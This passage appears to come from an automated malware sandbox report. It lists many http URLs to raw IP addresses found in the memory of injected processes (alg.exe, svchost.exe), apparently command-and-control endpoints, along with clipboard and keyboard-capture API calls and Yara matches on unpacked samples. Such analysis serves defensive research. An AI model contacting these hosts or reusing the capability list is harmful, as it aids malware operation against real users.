              Source: alg.exe, 00000008.00000003.2981382953.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/gbqdupu
              Source: alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ky
              Source: alg.exe, 00000008.00000003.1922932295.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1913832298.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/akythernet0-QoS
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/byear
              Source: alg.exe, 00000008.00000003.2846373705.0000000000590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/
              Source: alg.exe, 00000008.00000003.2644014392.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/hbv
              Source: alg.exe, 00000008.00000003.3163550787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3179831563.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3142560146.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3170087253.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3154349720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3149933208.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/ipraobeqvefqwo~J
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/weir
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/ewjlslyiisf
              Source: alg.exe, 00000008.00000003.2396437927.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/pboamknl
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3023182878.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3013990554.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/qnguomsjnupgmlrKG
              Source: alg.exe, 00000008.00000003.2913758256.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2903231630.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2952832694.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/flkouthsl
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/gmghpoftyccoynqy
              Source: alg.exe, 00000008.00000003.2699036567.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.254.94.185/ieicusmwh
              Source: alg.exe, 00000008.00000003.2458126956.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2459638272.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/dpntwbnivmh
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/nxbumxilirhmvku
              Source: alg.exe, 00000008.00000003.2678532380.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2724357178.000000000057E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2735370442.000000000057C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.94.10.34/rkgoodhecptjykcl
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/cblcujxhilpbxlv
              Source: alg.exe, 00000008.00000003.2644014392.000000000055D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/eevmjkkfks
              Source: alg.exe, 00000008.00000003.3191302720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3201005428.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/iasdsuhvtygftfd~J
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/jweaqenrkqbo
              Source: alg.exe, 00000008.00000003.2678532380.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/snachosinlefnrw
              Source: alg.exe, 00000008.00000003.2818358771.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2789761856.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2768064977.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2839959599.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2751327328.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2734340919.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2802220414.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/vbfsvakjwax
              Source: alg.exe, 00000008.00000003.2914740529.000000000058F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/
              Source: alg.exe, 00000008.00000003.2935944224.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2953580866.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2913758256.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2931823808.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/fxeavmroscrKG
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/ioljnnvkrvc
              Source: alg.exe, 00000008.00000003.2818358771.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2802220414.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/udhgonlj7S
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3023182878.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3013990554.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/gxnuggiifqd
              Source: alg.exe, 00000008.00000003.2451615823.0000000000573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/kaxtgyul
              Source: alg.exe, 00000008.00000003.2853288419.0000000000590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.213.104.86/
              Source: alg.exe, 00000008.00000003.2686547662.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2699036567.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.213.104.86/kitlgdtfGS
              Source: alg.exe, 00000008.00000003.2913758256.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2903231630.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2952832694.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2876522612.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.213.104.86/quoefwkpxb
              Source: alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.213.104.86/ylviltyasno
              Source: alg.exe, 00000008.00000003.3191302720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3179831563.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3170087253.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3201005428.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ayqsgvejwqqtuhlw
              Source: alg.exe, 00000008.00000003.1942321512.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ky
              Source: alg.exe, 00000008.00000003.3137092544.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3163550787.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3191302720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3179831563.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3142560146.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3120974183.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3170087253.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3201005428.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3154349720.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3149933208.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/lyeldophhxwh
              Source: alg.exe, 00000008.00000003.1935095606.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/dgeuecvnet0-QoS
              Source: alg.exe, 00000008.00000003.2642728992.0000000000593000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
              Source: alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/(
              Source: alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/0eS0
              Source: alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/1
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/fwbtaqdcjwd
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/h
              Source: alg.exe, 00000008.00000003.2316109693.0000000000530000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/hbkwpskje
              Source: alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/hbkwpskje&
              Source: alg.exe, 00000008.00000003.2818358771.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2789761856.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2768064977.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2839959599.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2845735610.00000000005C6000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2751327328.00000000005CA000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2802220414.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/kjomliy
              Source: alg.exe, 00000008.00000003.2678532380.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2642728992.000000000057F000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2659943434.0000000000581000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ktcaihfarwj=Thu
              Source: alg.exe, 00000008.00000003.2935944224.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2953580866.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3042269569.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3023182878.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3013990554.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3053741021.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2981382953.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2962263699.00000000005D2000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3033736358.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2931823808.00000000005CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/ohyfmaqfmywges
              Source: alg.exe, 00000008.00000003.2723489835.00000000005CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/vvlfkuqn
              Source: svchost.exe, 00000006.00000003.2551581839.00000000030A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/h
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905150358.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1890513668.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2509496925.0000000000591000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1905662972.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
              Source: alg.exe, 00000008.00000003.1890190874.0000000000561000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1890513668.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/dqlfliuucamv
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/elpwpt
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/elpwptings7
              Source: alg.exe, 00000008.00000003.3072571369.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3081392177.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3096626159.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3091151676.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/gtcagitskd5K
              Source: svchost.exe, 00000006.00000003.2551441037.000000000307D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2552020416.0000000003082000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ouftojymf
              Source: alg.exe, 00000008.00000003.2876522612.00000000005C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/scdrs
              Source: alg.exe, 00000008.00000003.1922932295.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/t
              Source: alg.exe, 00000008.00000003.1935095606.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1922932295.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/elpwpt
              Source: alg.exe, 00000008.00000003.1935095606.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1922932295.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.1913832298.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/hbj
              Source: alg.exe, 00000008.00000003.3120974183.00000000005D1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.3114893360.00000000005D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/yroespvujukavm
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2275600382.0000000000573000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2273228432.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2250681859.0000000000581000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2276387864.000000000057E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/0
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/S
              Source: svchost.exe, 00000006.00000003.2395862116.000000000307A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ddsolxmfcvq
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2274545313.0000000000530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/eyywnnlobvqfg
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/eyywnnlobvqfgs
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/gs
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/iar
              Source: alg.exe, 00000008.00000003.2274545313.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2291885104.000000000053E000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2316109693.000000000053E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/ipnvn$
              Source: alg.exe, 00000008.00000003.2250815667.0000000000560000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2274270451.0000000000565000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2273228432.0000000000560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/liar
              Source: alg.exe, 00000008.00000003.2033350591.0000000000560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/w
              Source: alg.exe, 00000008.00000003.2033350591.0000000000560000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/w.
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/ipnvn
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/liar
              Source: alg.exe, 00000008.00000003.2251017479.0000000000558000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000008.00000003.2033579316.0000000000558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197:80/w
              Source: name.exe, 00000001.00000002.1806914004.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000003.00000002.1824115002.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000005.00000002.1848783066.0000000003D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
              Source: svchost.exe, 00000006.00000003.2218266234.0000000004C40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
              Source: svchost.exe, 00000006.00000003.2327106139.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
              Source: svchost.exe, 00000006.00000003.2328526659.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2328772433.0000000004B90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_0045A10F
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_0045A10F
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0046DCB4 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0046DCB4
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
              Source: C:\Users\user\Desktop\tyRPPK48Mk.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 1_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,1_2_0047C81C
              Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 3_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_0047C81C
              Source: Yara matchFile source: 1.2.name.exe.3c50000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.name.exe.3d80000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.name.exe.3d80000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
